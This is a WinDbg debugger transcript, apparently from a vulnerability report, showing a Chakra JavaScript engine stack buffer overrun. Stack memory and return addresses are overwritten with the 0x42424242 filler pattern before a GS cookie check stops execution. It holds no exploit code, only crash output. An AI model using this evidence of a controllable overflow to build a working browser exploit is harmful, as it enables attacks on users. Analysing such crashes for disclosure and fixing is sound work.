0:016> dq ecx 000000d8`b83f9e98 00000000`00000030 000002aa`86879760 000000d8`b83f9ea8 00010000`42424242 00010000`42424242 000000d8`b83f9eb8 00010000`42424242 00010000`42424242 000000d8`b83f9ec8 00010000`42424242 00010000`42424242 000000d8`b83f9ed8 00010000`42424242 00010000`42424242 000000d8`b83f9ee8 00010000`42424242 00010000`42424242 000000d8`b83f9ef8 00010000`42424242 00010000`42424242 000000d8`b83f9f08 00010000`42424242 00010000`42424242 0:016> dq [ecx+edx*8] 000000d8`b8400000 ????????`???????? ????????`???????? 000000d8`b8400010 ????????`???????? ????????`???????? 000000d8`b8400020 ????????`???????? ????????`???????? 000000d8`b8400030 ????????`???????? ????????`???????? 000000d8`b8400040 ????????`???????? ????????`???????? 000000d8`b8400050 ????????`???????? ????????`???????? 000000d8`b8400060 ????????`???????? ????????`???????? 000000d8`b8400070 ????????`???????? ????????`???????? 0:016> !address 000000d8`b8400000 Usage: Allocation Base: 000000d8`b8400000 Base Address: 000000d8`b8400000 End Address: 000000d8`b84fc000 Region Size: 00000000`000fc000 Type: 00020000 MEM_PRIVATE State: 00002000 MEM_RESERVE Protect: 00000000 More info: ~17k 0:016> !address ecx Usage: Stack Allocation Base: 000000d8`b7a00000 Base Address: 000000d8`b83f4000 End Address: 000000d8`b8400000 Region Size: 00000000`0000c000 Type: 00020000 MEM_PRIVATE State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE More info: ~16k 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 
00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 0:016> g STATUS_STACK_BUFFER_OVERRUN encountered (1590.b70): Break instruction exception - code 80000003 (first chance) KERNELBASE!UnhandledExceptionFilter+0x85960: 00007ffe`9e61c120 cc int 3 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960 00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a 00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169 00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38 00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : 